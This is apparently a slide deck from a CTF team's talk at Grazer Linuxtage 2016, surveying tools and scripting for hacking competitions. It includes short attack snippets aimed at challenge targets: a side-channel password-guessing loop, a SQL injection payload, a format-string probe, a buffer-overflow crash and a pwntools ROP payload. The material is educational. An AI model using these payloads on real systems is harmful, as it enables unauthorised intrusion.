A CTF Hackers Toolbox Grazer Linuxtage 2016
$ who
mike / @f0rki: CS/InfoSec student, CTF player since 2010
@stefan2904: CS/InfoSec/CI student, CTF player since 2014
CTF: Capture The Flag
Collaborative hacking competitions, teams vs. teams.
The goal is to capture flags, e.g. CTF{THIS_IS_A_FLAG}
CTF Type: Jeopardy
Figure: Sharif CTF Challenge Board
CTF Type: Attack-Defense
Figure: RUCTFe 2015 Network Schema (source: RUCTF org)
CTF Type: Attack-Defense
Figure: FAUST CTF 2015 scoreboard
Why CTFs?
It’s fun!
Gain experience in information security.
Challenges modeled after real-world problems.
Sometimes real-world bugs modeled after CTF bugs?
LosFuzzys: A CTF Team in Graz
We Like Bugs!
A group of people interested in information security.
Primarily CS/SW/ICE students from TUGraz, but we welcome anyone interested and motivated :) and maybe even you ;)
Irregular Meet-ups
Where to start?
Talk to us! :-)
https://hack.more.systems
twitter: @LosFuzzys
Read writeups!
Repo: github.com/ctfs
Ours: hack.more.systems/writeups
CTF Toolbox
Great diversity of challenges, but some things turn up frequently.
Knowledge of the technology is necessary; experience helps a lot.
Using the right tools is essential, assuming you know how to use them . . .
Scripting is your best friend: be comfortable automating things.
Use whatever works best: bash, zsh etc.; Python, Ruby etc.
Command-Line-Fu is very helpful
Standard utils – grep, sed, awk, sort, cut, uniq, . . .
Network stuff – nc, socat, dig, nmap
Query JSON – jq
HTTP – curl
...
Pipe them together to get your results!
Bash Password Guessing
```bash
for x in q w e r t y u i o p a s d f g h j k l z \
         x c v b n m Q W E R T Y U I O P A S D F G H J \
         K L Z X C V B N M 1 2 3 4 5 6 7 8 9 0 "-" "_" "?"
do
    echo "= $x ="
    # count sigaction syscalls for this candidate character
    strace ./stage3.bin "Did_you_l$x$x$x$x$x$x$x$x" 2>&1 \
        | grep sigaction \
        | wc -l
done > log
# get highest count of sigactions and the triggering char (numeric sort, so "9" < "12")
cat log | grep -B 1 "$(cat log | grep -v = | sort -n | uniq | tail -n 1)"
```
Automated Browsing – python-requests
```python
import requests

URL = 'http://ctf.example.com'
s = requests.Session()
r = s.post(URL + '/login', data={'user': 'fuzzy', 'pass': '1234'})

# GET http://ctf.example.com/vuln?x='%20or%201=1--x
resp = s.get(URL + '/vuln', params={'x': '\' or 1=1 --x'})
# session cookie automagically used here
print(resp.text)  # flag{some_flag_of_some_service}
```
Dirty Networking – pwntools
```python
from pwn import *

r = remote('ctf.example.com', 1337)

# line based
r.recvline()
r.sendline('HELO %s%s%s%s')
r.recvuntil('250 Hello')

data = r.recv(4)
# unpack LE uint32 from bin
i = u32(data)
log.info('received uint32 {}'.format(i))
# pack BE uint32 to bin
r.send(p32(1094795585, endian='big'))
r.recvline()
```
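The same dialogue as above, replayed against a constructed fake service over a socketpair so it runs offline; this is an added example, not code from the slides, with u32/p32 reimplemented on top of struct to show what the pwntools helpers do under the hood (the fake service, its banner and the value 0x41424344 are all assumptions).

```python
import socket
import struct
import threading

def u32(data, endian='little'):
    """Unpack 4 bytes into an unsigned int (what pwntools' u32() does)."""
    return struct.unpack('<I' if endian == 'little' else '>I', data)[0]

def p32(value, endian='little'):
    """Pack an unsigned int into 4 bytes (what pwntools' p32() does)."""
    return struct.pack('<I' if endian == 'little' else '>I', value)

def recvn(sock, n):
    """Read exactly n bytes; recv() may return short reads, so loop."""
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise EOFError('connection closed after %d of %d bytes' % (len(buf), n))
        buf += chunk
    return buf
def recvuntil(sock, marker):
    """Read byte by byte until the data ends with marker (pwntools' recvuntil)."""
    buf = b''
    while not buf.endswith(marker):
        buf += recvn(sock, 1)
    return buf
def fake_service(sock, value):
    """Constructed stand-in for the CTF service: banner, greeting, LE uint32 out, BE uint32 back."""
    sock.sendall(b'220 fake.service ready\n')
    recvuntil(sock, b'\n')                      # the client's HELO line
    sock.sendall(b'250 Hello\n')
    sock.sendall(p32(value))                    # little-endian on the wire
    echoed = u32(recvn(sock, 4), endian='big')  # client answers big-endian
    sock.sendall(b'got %d\n' % echoed)
    sock.close()

def exchange(value=0x41424344):
    """Client side of the dialogue over a socketpair; returns (int received, server's last line)."""
    client, server = socket.socketpair()
    worker = threading.Thread(target=fake_service, args=(server, value))
    worker.start()
    recvuntil(client, b'\n')                    # banner line
    client.sendall(b'HELO fuzzy\n')
    recvuntil(client, b'250 Hello\n')
    received = u32(recvn(client, 4))            # LE bytes -> int
    client.sendall(p32(received, endian='big'))
    reply = recvuntil(client, b'\n').decode().strip()
    worker.join()
    client.close()
    return received, reply
```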
Finding & Analyzing Vulnerabilities
Analyzing Java/.NET Apps
Great decompilers!
Java/Dalvik bytecode: IntelliJ built-in decompiler (fernflower), procyon, http://www.javadecompilers.com/
Android apps/Dalvik bytecode: apktool, smali/baksmali, jadx, Xposed
.NET bytecode: ILSpy, JetBrains dotPeek
A wild binary appears!
```
$ file ./pwn
pwn: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, not stripped
$ objdump -d ./pwn | less
```
Keep Calm And Use radare2 From git
radare2 – example commands
Search for functions containing "exec": afl~exec
Show/search all strings in the file: izz, izz~FLAG
Compute CRC32 over the next 32 bytes: #crc32 32
Binary Decompilers
No really good open source binary decompilers :(
The radare guys are working on one.
Commercial/Closed-Source: Hex-Rays/IDA Pro Decompiler ($$$), Hopper ($), retdec (free, webservice, no x86_64)
Debugging?
Debuggers
Use gdb with one of those: PEDA, GEF, pwndbg, voltron, gdb-dashboard
gdb alternatives: lldb, radare2
Newer debugging approaches: qira, rr
Pwning!
```
$ mkfifo ./fifo
$ ./pwn ./fifo & python -c 'print("A" * 4128)' >> ./fifo
[1] 9391
The file has been saved successfully
[1]+  9391 segmentation fault (core dumped)  ./pwn ./fifo
$ dmesg | tail -n 1
pwn[9391]: segfault at 41414141 ip 0000000041414141 sp 00000000ffb6d340 error 14
```
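The crash above only tells you that eip ended up holding some of the 4128 "A"s, not which ones; pwntools' cyclic()/cyclic_find() answer that with a de Bruijn pattern in which every 4-byte window is unique, so the faulting register value maps back to exactly one input offset. This added example (not code from the slides) reimplements that crash-triage helper with the same alphabet and window size pwntools uses by default.

```python
import struct
from functools import lru_cache
from itertools import islice

ALPHABET = 'abcdefghijklmnopqrstuvwxyz'
N = 4  # window size: 4 bytes, the width of a 32-bit register

def _de_bruijn(alphabet=ALPHABET, n=N):
    """Yield the de Bruijn sequence B(k, n): every n-char window occurs once per cycle."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)

def cyclic(length):
    """First `length` chars of the pattern (same output as pwntools' cyclic())."""
    return ''.join(islice(_de_bruijn(), length))

@lru_cache(maxsize=None)
def _full_cycle():
    """One complete cycle plus N-1 chars so windows that wrap around are found too."""
    full = cyclic(len(ALPHABET) ** N)
    return full + full[:N - 1]

def cyclic_find(value):
    """Offset of a 4-char window in the pattern; an int is read as a little-endian register value.
    Returns -1 when the value did not come from the pattern (e.g. 0x41414141 from plain 'A's)."""
    if isinstance(value, int):
        value = struct.pack('<I', value).decode('latin-1')
    return _full_cycle().find(value[:N])
```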
pwntools again!
```python
from pwn import *  # NOQA

velf = ELF("./pwn")
r = ROP(velf)
r.call("exit", [42])
payload = "A" * 4124 + str(r)
# launch process
vp = process(["./pwn", "./fifo"])
gdb.attach(vp)  # break *0x8048f4e
with open("./fifo", "w") as f:
    f.write(payload)
# forward stdin/stdout to process stdin/stdout
vp.interactive()
```
pwntools/binjitsu
I/O abstraction (called Tubes)
ELF parser/info
Return Oriented Programming (ROP)
Shellcode: plug’n’pwn shellcode builder
Binary data “parsing”
...
Cryptography
Crypto Tools
Pen & Paper
sage CAS & python
Packages implementing attacks, e.g. python-paddingoracle, hashpumpy (hash length extension attack), ...
Learn to Improvise
Premature optimization* is the root of all evil!
* also commenting code
* also clean code
(only true for attack && during CTFs!)
If it works once, . . . it works!
Code-reuse between different CTFs!
Post-CTF code cleanup would be good . . .
A fool with a tool is still a fool!
https://hack.more.systems
Thanks to all LosFuzzys members, tuflowgraphy.at, realraum, IAIK
Writeups of Used Examples
https://hack.more.systems/writeups
9447ctf: premonition (web)
NDH quals 2016: matriochka (reversing)
NDH quals 2016: secure file reader (pwn)
don’t be eve!